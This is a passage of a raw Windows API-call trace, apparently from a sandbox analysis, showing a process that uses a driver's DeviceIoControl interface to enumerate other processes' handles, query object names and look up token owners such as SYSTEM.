Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003acfda0, HandleInformation=0x0) returned 0x0 [0244.377] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.377] PsReleaseProcessExitSynchronization () returned 0x2 [0244.377] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.377] ObQueryNameString (in: Object=0xfffffa8003acfda0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.377] ObfDereferenceObject (Object=0xfffffa8003acfda0) returned 0x2 [0244.377] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.377] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.378] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.378] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.378] PsAcquireProcessExitSynchronization () returned 0x0 [0244.378] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.378] ObReferenceObjectByHandle (in: Handle=0x750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003acfb40, HandleInformation=0x0) returned 0x0 [0244.378] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.378] PsReleaseProcessExitSynchronization () returned 0x2 [0244.378] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.378] ObQueryNameString (in: Object=0xfffffa8003acfb40, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.378] ObfDereferenceObject (Object=0xfffffa8003acfb40) returned 0x2 [0244.378] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.378] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.378] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.378] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.378] PsAcquireProcessExitSynchronization () returned 0x0 [0244.378] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.378] ObReferenceObjectByHandle (in: Handle=0x870, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fd5d10, HandleInformation=0x0) returned 0x0 [0244.378] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.378] PsReleaseProcessExitSynchronization () returned 0x2 [0244.378] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.379] ObQueryNameString (in: Object=0xfffffa8001fd5d10, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.379] ObfDereferenceObject (Object=0xfffffa8001fd5d10) returned 0x2 [0244.379] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.379] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc8 [0244.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.379] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003654700, HandleInformation=0x0) returned 0x0 [0244.379] ObOpenObjectByPointer (in: Object=0xfffffa8003654700, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000588) returned 0x0 [0244.379] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x40 [0244.379] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000588, DesiredAccess=0x8, TokenHandle=0xfffffa80030b9a00 | out: TokenHandle=0xfffffa80030b9a00*=0xc4) returned 0x0 [0244.379] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0244.379] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.379] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.379] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.382] CloseHandle (hObject=0xc4) returned 1 [0244.382] CloseHandle (hObject=0xc8) returned 1 [0244.382] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.382] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.382] PsAcquireProcessExitSynchronization () returned 0x0 [0244.383] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.383] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036897a0, HandleInformation=0x0) returned 0x0 [0244.383] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.383] PsReleaseProcessExitSynchronization () returned 0x2 [0244.383] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.383] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.383] ObfDereferenceObject (Object=0xfffffa80036897a0) returned 0x1 [0244.383] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.383] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.383] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.383] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.383] PsAcquireProcessExitSynchronization () returned 0x0 [0244.383] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.383] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036ff9e0, HandleInformation=0x0) returned 0x0 [0244.383] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.383] PsReleaseProcessExitSynchronization () returned 0x2 [0244.383] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.383] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.383] ObfDereferenceObject (Object=0xfffffa80036ff9e0) returned 0x1 [0244.383] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.383] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.384] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.384] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.384] PsAcquireProcessExitSynchronization () returned 0x0 [0244.384] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.384] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003778bc0, HandleInformation=0x0) returned 0x0 [0244.384] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.384] PsReleaseProcessExitSynchronization () returned 0x2 [0244.384] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.384] ObQueryNameString (in: Object=0xfffffa8003778bc0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.384] ObfDereferenceObject (Object=0xfffffa8003778bc0) returned 0x1 [0244.384] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.384] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.384] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0244.384] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.384] PsAcquireProcessExitSynchronization () returned 0x0 [0244.384] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.384] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003781f20, HandleInformation=0x0) returned 0x0 [0244.384] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.384] PsReleaseProcessExitSynchronization () returned 0x2 [0244.384] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.384] ObQueryNameString (in: Object=0xfffffa8003781f20, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.385] ObfDereferenceObject (Object=0xfffffa8003781f20) returned 0x2 [0244.385] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.385] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.385] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0244.385] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.385] PsAcquireProcessExitSynchronization () returned 0x0 [0244.385] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.385] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003780a70, HandleInformation=0x0) returned 0x0 [0244.385] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.385] PsReleaseProcessExitSynchronization () returned 0x2 [0244.385] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.385] ObQueryNameString (in: Object=0xfffffa8003780a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.385] ObfDereferenceObject (Object=0xfffffa8003780a70) returned 0x1 [0244.385] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.386] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.386] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0244.386] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.386] PsAcquireProcessExitSynchronization () returned 0x0 [0244.386] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.386] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003781dd0, HandleInformation=0x0) returned 0x0 [0244.386] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.386] PsReleaseProcessExitSynchronization () returned 0x2 [0244.386] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.386] ObQueryNameString (in: Object=0xfffffa8003781dd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.386] ObfDereferenceObject (Object=0xfffffa8003781dd0) returned 0x1 [0244.386] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.386] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.386] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0244.386] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.386] PsAcquireProcessExitSynchronization () returned 0x0 [0244.386] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0244.386] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036c0070, HandleInformation=0x0) returned 0x0 [0244.386] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.387] PsReleaseProcessExitSynchronization () returned 0x2 [0244.387] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0244.387] ObQueryNameString (in: Object=0xfffffa80036c0070, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.387] ObfDereferenceObject (Object=0xfffffa80036c0070) returned 0x11 [0244.387] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.387] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x250) returned 0xc8 [0244.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.387] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80036f9b30, HandleInformation=0x0) returned 0x0 [0244.387] ObOpenObjectByPointer (in: Object=0xfffffa80036f9b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000588) returned 0x0 [0244.387] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7d [0244.387] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000588, DesiredAccess=0x8, TokenHandle=0xfffffa80030b9a00 | out: TokenHandle=0xfffffa80030b9a00*=0xc4) returned 0x0 [0244.387] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0244.387] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.388] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.388] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.390] CloseHandle (hObject=0xc4) returned 1 [0244.390] CloseHandle (hObject=0xc8) returned 1 [0244.390] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.390] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.391] PsAcquireProcessExitSynchronization () returned 0x0 [0244.391] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.391] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036f6e00, HandleInformation=0x0) returned 0x0 [0244.391] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.391] PsReleaseProcessExitSynchronization () returned 0x2 [0244.391] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.391] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.391] ObfDereferenceObject (Object=0xfffffa80036f6e00) returned 0x1 [0244.391] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.391] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.391] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.391] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.391] PsAcquireProcessExitSynchronization () returned 0x0 [0244.391] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.391] ObReferenceObjectByHandle (in: Handle=0x6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003719c10, HandleInformation=0x0) returned 0x0 [0244.391] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.391] PsReleaseProcessExitSynchronization () returned 0x2 [0244.391] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.391] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.391] ObfDereferenceObject (Object=0xfffffa8003719c10) returned 0x1 [0244.391] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.392] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.392] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.392] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.392] PsAcquireProcessExitSynchronization () returned 0x0 [0244.392] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.392] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800370fa20, HandleInformation=0x0) returned 0x0 [0244.392] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.392] PsReleaseProcessExitSynchronization () returned 0x2 [0244.392] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.392] ObQueryNameString (in: Object=0xfffffa800370fa20, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.392] ObfDereferenceObject (Object=0xfffffa800370fa20) returned 0x1 [0244.392] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.392] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.392] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.392] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) 